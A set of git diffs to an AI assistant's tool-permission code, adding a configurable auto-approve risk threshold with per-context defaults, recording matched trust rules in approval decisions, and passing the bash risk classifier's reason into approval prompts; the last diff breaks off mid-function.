     // to the risk-based path where Low risk still auto-allows.
@@ -486,10 +486,10 @@ describe("edge cases", () => {
       isWorkspaceScoped: true,
     });
     expect(result.decision).toBe("allow");
-    // The reason should be "Low risk" not "Workspace mode" — the workspace
+    // The reason should be "low risk" not "Workspace mode" — the workspace
     // auto-allow was bypassed because bash is on the host.
     expect(result.reason).not.toContain("Workspace mode");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("hasManifestOverride with toolOrigin set to skill — third-party check triggers on origin", () => {
@@ -513,8 +513,200 @@ describe("edge cases", () => {
     });
     // toolOrigin is "builtin", so the third-party skill check doesn't trigger.
     // The hasManifestOverride check requires !toolOrigin, but toolOrigin is set.
-    // Falls through to risk-based: Low → allow.
+    // Falls through to risk-based: Low → allow (within default "low" threshold).
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
+  });
+});
+
+// ── autoApproveUpTo threshold ─────────────────────────────────────────────────
+
+describe("autoApproveUpTo threshold", () => {
+  describe('autoApproveUpTo: "none" — everything prompts', () => {
+    test("Low risk → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "some_tool",
+        autoApproveUpTo: "none",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+
+    test("Medium risk → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Medium,
+        toolName: "some_tool",
+        autoApproveUpTo: "none",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+
+    test("High risk → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.High,
+        toolName: "some_tool",
+        autoApproveUpTo: "none",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+  });
+
+  describe('autoApproveUpTo: "low" — default, matches existing behavior', () => {
+    test("Low risk → allow", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "some_tool",
+        autoApproveUpTo: "low",
+      });
+      expect(result.decision).toBe("allow");
+      expect(result.reason).toContain("within auto-approve threshold");
+    });
+
+    test("Medium risk → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Medium,
+        toolName: "some_tool",
+        autoApproveUpTo: "low",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+
+    test("High risk → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.High,
+        toolName: "some_tool",
+        autoApproveUpTo: "low",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+  });
+
+  describe('autoApproveUpTo: "medium" — Low and Medium auto-allow', () => {
+    test("Low risk → allow", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "some_tool",
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("allow");
+      expect(result.reason).toContain("within auto-approve threshold");
+    });
+
+    test("Medium risk → allow", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Medium,
+        toolName: "some_tool",
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("allow");
+      expect(result.reason).toContain("within auto-approve threshold");
+    });
+
+    test("High risk → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.High,
+        toolName: "some_tool",
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+  });
+
+  describe("threshold interacts correctly with rule-based decisions", () => {
+    test("deny rule still denies regardless of threshold", () => {
+      const denyRule = makeRule({ decision: "deny" });
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "bash",
+        matchedRule: denyRule,
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("deny");
+      expect(result.matchedRule).toBe(denyRule);
+    });
+
+    test("ask rule still prompts regardless of threshold", () => {
+      const askRule = makeRule({ decision: "ask" });
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "bash",
+        matchedRule: askRule,
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.matchedRule).toBe(askRule);
+    });
+
+    test("allow rule still allows non-High regardless of threshold", () => {
+      const allowRule = makeRule({ decision: "allow" });
+      const result = evaluate({
+        riskLevel: RiskLevel.Medium,
+        toolName: "file_write",
+        matchedRule: allowRule,
+        autoApproveUpTo: "none",
+      });
+      expect(result.decision).toBe("allow");
+      expect(result.matchedRule).toBe(allowRule);
+    });
+  });
+
+  describe("threshold interacts correctly with strict mode", () => {
+    test("strict mode still prompts even with medium threshold", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "file_read",
+        permissionsMode: "strict",
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("Strict mode");
+    });
+  });
+
+  describe("threshold interacts correctly with workspace mode", () => {
+    test("workspace mode workspace-scoped Low still allows via workspace path (before threshold)", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "file_read",
+        permissionsMode: "workspace",
+        isWorkspaceScoped: true,
+        autoApproveUpTo: "none",
+      });
+      // Workspace mode auto-allow fires before the threshold fallback
+      expect(result.decision).toBe("allow");
+      expect(result.reason).toContain("Workspace mode");
+    });
+
+    test("workspace mode non-workspace-scoped Low with none threshold → prompt", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "file_read",
+        permissionsMode: "workspace",
+        isWorkspaceScoped: false,
+        autoApproveUpTo: "none",
+      });
+      // Falls through workspace check (not workspace-scoped), then threshold
+      // "none" means Low risk is above threshold → prompt
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+  });
+
+  describe("threshold defaults to low when omitted", () => {
+    test("omitted autoApproveUpTo behaves as low", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "some_tool",
+        // autoApproveUpTo not set
+      });
+      expect(result.decision).toBe("allow");
+      expect(result.reason).toContain("within auto-approve threshold");
+    });
   });
 });

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -49,6 +49,7 @@ describe("deny rule", () => {
     });
     expect(result.decision).toBe("deny");
     expect(result.reason).toContain("deny rule");
+    expect(result.matchedRule).toBe(denyRule);
   });
 
   test("deny at Medium risk", () => {
@@ -77,6 +78,7 @@ describe("ask rule", () => {
     const result = evaluate({ riskLevel: RiskLevel.Low, matchedRule: askRule });
     expect(result.decision).toBe("prompt");
     expect(result.reason).toContain("ask rule");
+    expect(result.matchedRule).toBe(askRule);
   });
 
   test("ask at Medium risk", () => {
@@ -108,6 +110,7 @@ describe("allow rule", () => {
     });
     expect(result.decision).toBe("allow");
     expect(result.reason).toContain("Matched trust rule");
+    expect(result.matchedRule).toBe(allowRule);
   });
 
   test("allow at Medium risk", () => {
@@ -117,9 +120,10 @@ describe("allow rule", () => {
     });
     expect(result.decision).toBe("allow");
     expect(result.reason).toContain("Matched trust rule");
+    expect(result.matchedRule).toBe(allowRule);
   });
 
-  test("allow at High risk — non-containerized bash → prompt", () => {
+  test("allow at High risk — non-containerized bash → prompt, no matchedRule in decision", () => {
     const result = evaluate({
       riskLevel: RiskLevel.High,
       toolName: "bash",
@@ -128,9 +132,11 @@ describe("allow rule", () => {
     });
     expect(result.decision).toBe("prompt");
     expect(result.reason).toContain("High risk");
+    // Decision is driven by risk-based fallback, not the rule
+    expect(result.matchedRule).toBeUndefined();
   });
 
-  test("allow at High risk — containerized bash → allow (auto-allow)", () => {
+  test("allow at High risk — containerized bash → allow (auto-allow), matchedRule present", () => {
     const result = evaluate({
       riskLevel: RiskLevel.High,
       toolName: "bash",
@@ -139,9 +145,10 @@ describe("allow rule", () => {
     });
     expect(result.decision).toBe("allow");
     expect(result.reason).toContain("auto-allow-high-risk");
+    expect(result.matchedRule).toBe(allowRule);
   });
 
-  test("allow at High risk — non-bash tool, containerized → prompt", () => {
+  test("allow at High risk — non-bash tool, containerized → prompt, no matchedRule in decision", () => {
     const result = evaluate({
       riskLevel: RiskLevel.High,
       toolName: "file_write",
@@ -150,9 +157,11 @@ describe("allow rule", () => {
     });
     expect(result.decision).toBe("prompt");
     expect(result.reason).toContain("High risk");
+    // Decision is driven by risk-based fallback, not the rule
+    expect(result.matchedRule).toBeUndefined();
   });
 
-  test("allow at High risk — non-bash tool, non-containerized → prompt", () => {
+  test("allow at High risk — non-bash tool, non-containerized → prompt, no matchedRule in decision", () => {
     const result = evaluate({
       riskLevel: RiskLevel.High,
       toolName: "file_write",
@@ -161,6 +170,8 @@ describe("allow rule", () => {
     });
     expect(result.decision).toBe("prompt");
     expect(result.reason).toContain("High risk");
+    // Decision is driven by risk-based fallback, not the rule
+    expect(result.matchedRule).toBeUndefined();
   });
 });
 

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -1,7 +1,7 @@
 import { describe, expect, test } from "bun:test";
 
 import type { ApprovalContext, ApprovalDecision } from "./approval-policy.js";
-import { DefaultApprovalPolicy } from "./approval-policy.js";
+import { DefaultApprovalPolicy, resolveThreshold } from "./approval-policy.js";
 import type { TrustRule } from "./types.js";
 import { RiskLevel } from "./types.js";
 
@@ -707,6 +707,93 @@ describe("autoApproveUpTo threshold", () => {
       });
       expect(result.decision).toBe("allow");
       expect(result.reason).toContain("within auto-approve threshold");
+    });
+  });
+});
+
+// ── resolveThreshold ─────────────────────────────────────────────────────────
+
+describe("resolveThreshold", () => {
+  describe("scalar form", () => {
+    test("returns scalar for conversation context", () => {
+      expect(resolveThreshold("low", "conversation")).toBe("low");
+    });
+
+    test("returns scalar for background context", () => {
+      expect(resolveThreshold("medium", "background")).toBe("medium");
+    });
+
+    test("returns scalar for headless context", () => {
+      expect(resolveThreshold("none", "headless")).toBe("none");
+    });
+
+    test("returns scalar when executionContext is omitted", () => {
+      expect(resolveThreshold("low")).toBe("low");
+    });
+  });
+
+  describe("object form", () => {
+    const perContext = {
+      conversation: "low" as const,
+      background: "medium" as const,
+      headless: "none" as const,
+    };
+
+    test("returns conversation threshold for conversation context", () => {
+      expect(resolveThreshold(perContext, "conversation")).toBe("low");
+    });
+
+    test("returns background threshold for background context", () => {
+      expect(resolveThreshold(perContext, "background")).toBe("medium");
+    });
+
+    test("returns headless threshold for headless context", () => {
+      expect(resolveThreshold(perContext, "headless")).toBe("none");
+    });
+
+    test("defaults to conversation when executionContext is omitted", () => {
+      expect(resolveThreshold(perContext)).toBe("low");
+    });
+  });
+
+  describe("per-context thresholds in policy evaluation", () => {
+    test("conversation context with low threshold prompts medium risk", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Medium,
+        toolName: "some_tool",
+        autoApproveUpTo: "low",
+      });
+      expect(result.decision).toBe("prompt");
+    });
+
+    test("background context with medium threshold allows medium risk", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Medium,
+        toolName: "some_tool",
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("allow");
+      expect(result.reason).toContain("within auto-approve threshold");
+    });
+
+    test("headless context with none threshold prompts low risk", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.Low,
+        toolName: "some_tool",
+        autoApproveUpTo: "none",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
+    });
+
+    test("background context with medium threshold prompts high risk", () => {
+      const result = evaluate({
+        riskLevel: RiskLevel.High,
+        toolName: "some_tool",
+        autoApproveUpTo: "medium",
+      });
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("above auto-approve threshold");
     });
   });
 });

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -1,7 +1,11 @@
+import type { PermissionsConfig } from "../config/schemas/security.js";
 import type { TrustRule } from "./types.js";
 import { RiskLevel } from "./types.js";
 
 // ── Types ────────────────────────────────────────────────────────────────────
+
+/** Execution context for per-context threshold resolution. */
+export type ExecutionContext = "conversation" | "background" | "headless";
 
 /** Contextual information that an approval policy uses to reach a decision. */
 export interface ApprovalContext {
@@ -18,12 +22,34 @@ export interface ApprovalContext {
   /** Whether the tool has a manifest override (unregistered skill tool). */
   hasManifestOverride?: boolean;
   /**
-   * Auto-approve tools at or below this risk level when no rule matches.
+   * Resolved auto-approve threshold for this execution context.
    * - "none": prompt for everything (strictest)
    * - "low": auto-approve Low risk (default, matches existing behavior)
    * - "medium": auto-approve Low and Medium risk
    */
   autoApproveUpTo?: "none" | "low" | "medium";
+}
+
+// ── Threshold resolution ─────────────────────────────────────────────────────
+
+/**
+ * Resolve the `autoApproveUpTo` config value to a scalar threshold for
+ * the given execution context.
+ *
+ * - Scalar string → returned as-is for all contexts
+ * - Object with per-context overrides → returns the value for the context
+ *
+ * When `executionContext` is omitted, defaults to `"conversation"`.
+ */
+export function resolveThreshold(
+  configValue: PermissionsConfig["autoApproveUpTo"] | undefined,
+  executionContext?: ExecutionContext,
+): "none" | "low" | "medium" {
+  if (configValue == null || typeof configValue === "string") {
+    return configValue ?? "low";
+  }
+  const ctx = executionContext ?? "conversation";
+  return configValue[ctx];
 }
 
 /** The outcome of an approval policy evaluation. */

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -17,6 +17,13 @@ export interface ApprovalContext {
   isSkillBundled?: boolean;
   /** Whether the tool has a manifest override (unregistered skill tool). */
   hasManifestOverride?: boolean;
+  /**
+   * Auto-approve tools at or below this risk level when no rule matches.
+   * - "none": prompt for everything (strictest)
+   * - "low": auto-approve Low risk (default, matches existing behavior)
+   * - "medium": auto-approve Low and Medium risk
+   */
+  autoApproveUpTo?: "none" | "low" | "medium";
 }
 
 /** The outcome of an approval policy evaluation. */
@@ -49,9 +56,8 @@ export interface ApprovalPolicy {
  * 8. No rule + workspace mode + Low + workspace-scoped → allow
  *    (except non-containerized bash — never auto-allow)
  * 9. No rule + Low + bundled skill → allow
- * 10. High → prompt
- * 11. Low → allow
- * 12. Medium → prompt
+ * 10. Risk ≤ autoApproveUpTo threshold → allow
+ * 11. Risk > autoApproveUpTo threshold → prompt
  */
 export class DefaultApprovalPolicy implements ApprovalPolicy {
   evaluate(context: ApprovalContext): ApprovalDecision {
@@ -161,22 +167,25 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       }
     }
 
-    // ── 10–12. Risk-based fallback ────────────────────────────────────
-    if (riskLevel === RiskLevel.High) {
+    // ── 10–11. Risk-based fallback: compare risk against configured threshold ─
+    const autoApproveUpTo = context.autoApproveUpTo ?? "low";
+    const riskOrdinal: Record<string, number> = { low: 0, medium: 1, high: 2 };
+    const thresholdOrdinal: Record<string, number> = {
+      none: -1,
+      low: 0,
+      medium: 1,
+    };
+    const risk = riskOrdinal[riskLevel] ?? 2;
+    const threshold = thresholdOrdinal[autoApproveUpTo] ?? 0;
+    if (risk <= threshold) {
       return {
-        decision: "prompt",
-        reason: "High risk: always requires approval",
+        decision: "allow",
+        reason: `${riskLevel} risk: within auto-approve threshold`,
       };
     }
-
-    if (riskLevel === RiskLevel.Low) {
-      return { decision: "allow", reason: "Low risk: auto-allowed" };
-    }
-
-    // Medium (or any unrecognized risk level)
     return {
       decision: "prompt",
-      reason: `${riskLevel} risk: requires approval`,
+      reason: `${riskLevel} risk: above auto-approve threshold`,
     };
   }
 

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -36,8 +36,6 @@ export interface ApprovalPolicy {
 
 /**
  * Implements the approval decision policy used by `check()` in checker.ts.
- * Each branch is annotated with the corresponding decision path so reviewers
- * can verify 1:1 parity.
  *
  * The decision flow:
  *

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -23,6 +23,8 @@ export interface ApprovalContext {
 export interface ApprovalDecision {
   decision: "allow" | "prompt" | "deny";
   reason: string;
+  /** Present only when the decision was driven by a matched rule. */
+  matchedRule?: TrustRule;
 }
 
 /** An object that evaluates an approval context and returns a decision. */
@@ -33,9 +35,9 @@ export interface ApprovalPolicy {
 // ── Default implementation ───────────────────────────────────────────────────
 
 /**
- * Replicates the exact approval decision logic from `check()` in checker.ts
- * (lines 604-725). Each branch is annotated with the corresponding checker.ts
- * code path so reviewers can verify 1:1 parity.
+ * Implements the approval decision policy used by `check()` in checker.ts.
+ * Each branch is annotated with the corresponding decision path so reviewers
+ * can verify 1:1 parity.
  *
  * The decision flow:
  *
@@ -72,6 +74,7 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       return {
         decision: "deny",
         reason: `Blocked by deny rule: ${matchedRule.pattern}`,
+        matchedRule,
       };
     }
 
@@ -80,6 +83,7 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       return {
         decision: "prompt",
         reason: `Matched ask rule: ${matchedRule.pattern}`,
+        matchedRule,
       };
     }
 
@@ -90,6 +94,7 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
         return {
           decision: "allow",
           reason: `Matched trust rule: ${matchedRule.pattern}`,
+          matchedRule,
         };
       }
 
@@ -98,10 +103,13 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
         return {
           decision: "allow",
           reason: `Matched trust rule in auto-allow-high-risk context: ${matchedRule.pattern}`,
+          matchedRule,
         };
       }
 
       // 5. Allow rule + High (no auto-allow) → fall through to risk-based
+      // Note: matchedRule is intentionally omitted from the risk-based
+      // fallback return — the decision is driven by risk, not the rule.
     }
 
     // ── 6. No rule + third-party skill tool → prompt ──────────────────
@@ -176,7 +184,7 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
 
   /**
    * Determines at runtime whether a high-risk operation should be auto-allowed.
-   * Mirrors `shouldAutoAllowHighRisk()` in checker.ts.
+   * Auto-allows high-risk operations when running in a containerized sandbox.
    *
    * Auto-allow cases:
    * - Containerized bash: all commands are sandboxed, so high-risk is safe.

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -41,12 +41,22 @@ export interface ApprovalContext {
  *
  * When `executionContext` is omitted, defaults to `"conversation"`.
  */
+/** Per-context defaults when `autoApproveUpTo` is omitted from config. */
+const CONTEXT_DEFAULTS: Record<ExecutionContext, "none" | "low" | "medium"> = {
+  conversation: "low",
+  background: "medium",
+  headless: "none",
+};
+
 export function resolveThreshold(
   configValue: PermissionsConfig["autoApproveUpTo"] | undefined,
   executionContext?: ExecutionContext,
 ): "none" | "low" | "medium" {
-  if (configValue == null || typeof configValue === "string") {
-    return configValue ?? "low";
+  if (configValue == null) {
+    return CONTEXT_DEFAULTS[executionContext ?? "conversation"];
+  }
+  if (typeof configValue === "string") {
+    return configValue;
   }
   const ctx = executionContext ?? "conversation";
   return configValue[ctx];

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -1,0 +1,190 @@
+import type { TrustRule } from "./types.js";
+import { RiskLevel } from "./types.js";
+
+// ── Types ────────────────────────────────────────────────────────────────────
+
+/** Contextual information that an approval policy uses to reach a decision. */
+export interface ApprovalContext {
+  riskLevel: RiskLevel;
+  toolName: string;
+  matchedRule?: TrustRule;
+  permissionsMode: "strict" | "workspace";
+  isContainerized: boolean;
+  isWorkspaceScoped: boolean;
+  /** Where the tool originates from — "skill" for skill-provided tools, "builtin" for core tools. */
+  toolOrigin?: "skill" | "builtin";
+  /** Whether the tool's owning skill is a first-party bundled skill. */
+  isSkillBundled?: boolean;
+  /** Whether the tool has a manifest override (unregistered skill tool). */
+  hasManifestOverride?: boolean;
+}
+
+/** The outcome of an approval policy evaluation. */
+export interface ApprovalDecision {
+  decision: "allow" | "prompt" | "deny";
+  reason: string;
+}
+
+/** An object that evaluates an approval context and returns a decision. */
+export interface ApprovalPolicy {
+  evaluate(context: ApprovalContext): ApprovalDecision;
+}
+
+// ── Default implementation ───────────────────────────────────────────────────
+
+/**
+ * Replicates the exact approval decision logic from `check()` in checker.ts
+ * (lines 604-725). Each branch is annotated with the corresponding checker.ts
+ * code path so reviewers can verify 1:1 parity.
+ *
+ * The decision flow:
+ *
+ * 1. Deny rule → deny
+ * 2. Ask rule → prompt
+ * 3. Allow rule + non-High → allow
+ * 4. Allow rule + High + containerized bash → allow (shouldAutoAllowHighRisk)
+ * 5. Allow rule + High + no auto-allow → prompt (fall through)
+ * 6. No rule + third-party skill tool → prompt
+ * 7. No rule + strict mode → prompt
+ * 8. No rule + workspace mode + Low + workspace-scoped → allow
+ *    (except non-containerized bash — never auto-allow)
+ * 9. No rule + Low + bundled skill → allow
+ * 10. High → prompt
+ * 11. Low → allow
+ * 12. Medium → prompt
+ */
+export class DefaultApprovalPolicy implements ApprovalPolicy {
+  evaluate(context: ApprovalContext): ApprovalDecision {
+    const {
+      riskLevel,
+      toolName,
+      matchedRule,
+      permissionsMode,
+      isContainerized,
+      isWorkspaceScoped,
+      toolOrigin,
+      isSkillBundled,
+      hasManifestOverride,
+    } = context;
+
+    // ── 1. Deny rules apply at ALL risk levels ────────────────────────
+    if (matchedRule && matchedRule.decision === "deny") {
+      return {
+        decision: "deny",
+        reason: `Blocked by deny rule: ${matchedRule.pattern}`,
+      };
+    }
+
+    // ── 2. Ask rules always prompt ────────────────────────────────────
+    if (matchedRule && matchedRule.decision === "ask") {
+      return {
+        decision: "prompt",
+        reason: `Matched ask rule: ${matchedRule.pattern}`,
+      };
+    }
+
+    // ── 3–5. Allow rule handling ──────────────────────────────────────
+    if (matchedRule) {
+      // 3. Allow rule + non-High → allow
+      if (riskLevel !== RiskLevel.High) {
+        return {
+          decision: "allow",
+          reason: `Matched trust rule: ${matchedRule.pattern}`,
+        };
+      }
+
+      // 4. Allow rule + High + containerized bash → allow
+      if (this.shouldAutoAllowHighRisk(toolName, isContainerized)) {
+        return {
+          decision: "allow",
+          reason: `Matched trust rule in auto-allow-high-risk context: ${matchedRule.pattern}`,
+        };
+      }
+
+      // 5. Allow rule + High (no auto-allow) → fall through to risk-based
+    }
+
+    // ── 6. No rule + third-party skill tool → prompt ──────────────────
+    if (!matchedRule) {
+      if (toolOrigin === "skill" && !isSkillBundled) {
+        return {
+          decision: "prompt",
+          reason: "Skill tool: requires approval by default",
+        };
+      }
+      if (hasManifestOverride && !toolOrigin) {
+        return {
+          decision: "prompt",
+          reason: "Skill tool: requires approval by default",
+        };
+      }
+    }
+
+    // ── 7. No rule + strict mode → prompt ─────────────────────────────
+    if (permissionsMode === "strict" && !matchedRule) {
+      return {
+        decision: "prompt",
+        reason: "Strict mode: no matching rule, requires approval",
+      };
+    }
+
+    // ── 8. No rule + workspace mode + Low + workspace-scoped → allow ──
+    // Exception: non-containerized bash never auto-allows.
+    if (
+      permissionsMode === "workspace" &&
+      !matchedRule &&
+      riskLevel === RiskLevel.Low
+    ) {
+      if (toolName === "bash" && !isContainerized) {
+        // Fall through to risk-based policy below
+      } else if (isWorkspaceScoped) {
+        return {
+          decision: "allow",
+          reason: "Workspace mode: workspace-scoped operation auto-allowed",
+        };
+      }
+    }
+
+    // ── 9. No rule + Low + bundled skill → allow ──────────────────────
+    if (!matchedRule && riskLevel === RiskLevel.Low) {
+      if (toolOrigin === "skill" && isSkillBundled) {
+        return {
+          decision: "allow",
+          reason: "Bundled skill tool: low risk, auto-allowed",
+        };
+      }
+    }
+
+    // ── 10–12. Risk-based fallback ────────────────────────────────────
+    if (riskLevel === RiskLevel.High) {
+      return {
+        decision: "prompt",
+        reason: "High risk: always requires approval",
+      };
+    }
+
+    if (riskLevel === RiskLevel.Low) {
+      return { decision: "allow", reason: "Low risk: auto-allowed" };
+    }
+
+    // Medium (or any unrecognized risk level)
+    return {
+      decision: "prompt",
+      reason: `${riskLevel} risk: requires approval`,
+    };
+  }
+
+  /**
+   * Determines at runtime whether a high-risk operation should be auto-allowed.
+   * Mirrors `shouldAutoAllowHighRisk()` in checker.ts.
+   *
+   * Auto-allow cases:
+   * - Containerized bash: all commands are sandboxed, so high-risk is safe.
+   */
+  private shouldAutoAllowHighRisk(
+    toolName: string,
+    isContainerized: boolean,
+  ): boolean {
+    return toolName === "bash" && isContainerized;
+  }
+}

--- a/assistant/src/permissions/bash-risk-classifier.ts
+++ b/assistant/src/permissions/bash-risk-classifier.ts
@@ -135,8 +135,6 @@ export function matchesArgRule(rule: ArgRule, arg: string): boolean {
 }
 
 // ── Wrapper unwrapping ───────────────────────────────────────────────────────
-// Reuses the same logic as checker.ts for wrapper unwrapping. We inline the
-// relevant constants and algorithm here to avoid needing to export from checker.ts.
 
 const WRAPPER_SKIP_FIRST_POSITIONAL = new Set(["timeout", "taskset"]);
 const ENV_VALUE_FLAGS = new Set(["-u", "--unset", "-C", "--chdir"]);
@@ -145,8 +143,6 @@ const TIMEOUT_VALUE_FLAGS = new Set(["-s", "--signal", "-k", "--kill-after"]);
 /**
  * Given a wrapper segment, extract the wrapped program and its args.
  * Returns undefined when no suitable argument is found.
- *
- * Replicates getWrappedProgramWithArgs from checker.ts.
  */
 function getWrappedProgramWithArgs(seg: {
   program: string;
@@ -204,7 +200,7 @@ function firstPositionalArg(
 
 // ── Safe-file downgrade for rm ────────────────────────────────────────────────
 // Bare filenames that `rm` is allowed to delete at Medium risk (instead of
-// High) in sandboxed bash. Matches checker.ts isRmOfKnownSafeFile behavior.
+// High) in sandboxed bash.
 const RM_SAFE_BARE_FILES = new Set(["BOOTSTRAP.md", "UPDATES.md"]);
 
 // ── Segment classification ───────────────────────────────────────────────────
@@ -440,8 +436,7 @@ export function classifySegment(
   // 7. rm safe-file downgrade (sandbox only)
   // When rm targets a single known safe bare file (no flags, no path separators),
   // downgrade to medium in sandboxed bash. host_bash keeps high because it has a
-  // global ask rule that would prompt medium-risk commands. Matches checker.ts
-  // isRmOfKnownSafeFile + toolName guard.
+  // global ask rule that would prompt medium-risk commands.
   if (
     programName === "rm" &&
     toolName === "bash" &&
@@ -655,11 +650,9 @@ export class BashRiskClassifier implements RiskClassifier<BashClassifierInput> {
       maxReason = parsed.dangerousPatterns[0].description;
     }
 
-    // Opaque constructs escalation (matches checker.ts behavior):
+    // Opaque constructs escalation:
     // - With dangerous patterns present → escalate to high
     // - Without dangerous patterns → escalate to medium only
-    // checker.ts returns Medium for opaque constructs before the per-segment
-    // loop, so opaque-without-danger is medium, not high.
     if (parsed.hasOpaqueConstructs) {
       const opaqueTarget: Risk =
         parsed.dangerousPatterns.length > 0 ? "high" : "medium";

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -54,8 +54,15 @@ import { isWorkspaceScopedInvocation } from "./workspace-policy.js";
 // Invalidated when trust rules change since risk classification for file tools
 // depends on skill source path checks which reference config, but the core
 // risk logic is input-deterministic.
+/** The result of classifyRisk(): a risk level with an optional human-readable reason. */
+export interface RiskClassification {
+  level: RiskLevel;
+  /** Human-readable explanation of why this risk level was assigned (bash/host_bash only). */
+  reason?: string;
+}
+
 const RISK_CACHE_MAX = 256;
-const riskCache = new Map<string, RiskLevel>();
+const riskCache = new Map<string, RiskClassification>();
 let riskCacheInvalidationHookRegistered = false;
 
 function riskCacheKey(
@@ -354,7 +361,7 @@ export async function classifyRisk(
   preParsed?: ParsedCommand,
   manifestOverride?: ManifestOverride,
   signal?: AbortSignal,
-): Promise<RiskLevel> {
+): Promise<RiskClassification> {
   signal?.throwIfAborted();
   ensureRiskCacheInvalidationHook();
 
@@ -374,25 +381,30 @@ export async function classifyRisk(
   }
 
   // ── Bash/host_bash: delegate to the registry-driven BashRiskClassifier ────
-  let result: RiskLevel;
+  let result: RiskClassification;
   if (toolName === "bash" || toolName === "host_bash") {
     const command = ((input.command as string) ?? "").trim();
     if (!command) {
-      result = RiskLevel.Low;
+      result = { level: RiskLevel.Low };
     } else {
       const assessment = await bashRiskClassifier.classify({
         command,
         toolName: toolName as "bash" | "host_bash",
       });
-      result = riskToRiskLevel(assessment.riskLevel);
+      result = {
+        level: riskToRiskLevel(assessment.riskLevel),
+        reason: assessment.reason,
+      };
     }
   } else {
-    result = await classifyRiskUncached(
-      toolName,
-      input,
-      workingDir,
-      manifestOverride,
-    );
+    result = {
+      level: await classifyRiskUncached(
+        toolName,
+        input,
+        workingDir,
+        manifestOverride,
+      ),
+    };
   }
 
   // Proxied bash commands route through the credential proxy which handles
@@ -401,9 +413,9 @@ export async function classifyRisk(
   if (
     toolName === "bash" &&
     input.network_mode === "proxied" &&
-    result === RiskLevel.High
+    result.level === RiskLevel.High
   ) {
-    result = RiskLevel.Medium;
+    result = { level: RiskLevel.Medium, reason: result.reason };
   }
 
   if (cacheKey) {
@@ -564,7 +576,7 @@ export async function check(
     }
   }
 
-  const risk = await classifyRisk(
+  const { level: risk, reason: riskReason } = await classifyRisk(
     toolName,
     input,
     workingDir,
@@ -612,9 +624,26 @@ export async function check(
   // Delegate the allow/prompt/deny decision to the approval policy
   const approvalDecision = defaultApprovalPolicy.evaluate(approvalContext);
 
+  // Enrich the reason with the classifier's explanation when available.
+  // For risk-based fallback decisions (prompt/deny from High/Medium risk),
+  // incorporate the classifier reason so the user sees *why* the command
+  // was classified at that level (e.g. "High risk (Recursive force delete): requires approval").
+  let enrichedReason = approvalDecision.reason;
+  if (riskReason && !approvalDecision.matchedRule) {
+    const riskLabelMatch = enrichedReason.match(
+      /^(High|Medium|Low|high|medium|low) risk(.*)/i,
+    );
+    if (riskLabelMatch) {
+      const capitalizedLabel =
+        riskLabelMatch[1].charAt(0).toUpperCase() +
+        riskLabelMatch[1].slice(1).toLowerCase();
